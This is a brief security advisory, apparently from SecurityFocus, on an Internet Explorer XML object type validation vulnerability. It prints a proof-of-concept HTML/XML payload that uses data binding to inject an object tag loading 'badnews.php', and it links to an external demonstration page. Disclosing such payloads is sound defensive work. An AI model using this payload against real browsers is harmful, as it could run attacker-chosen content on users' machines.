Microsoft Internet Explorer XML Page Object Type Validation Vulnerability

The following proof of concept has been supplied: <span datasrc="#oExec" datafld="exploit" dataformatas="html"></span> <xml id="oExec"> <security> <exploit> <![CDATA[ <object id="oFile" data="badnews.php"></object> ]]> </exploit> </security> </xml> A proof of concept demonstration is available on the following web site: http://www.malware.com/greymagic.html


 

Privacy Statement
Copyright 2010, SecurityFocus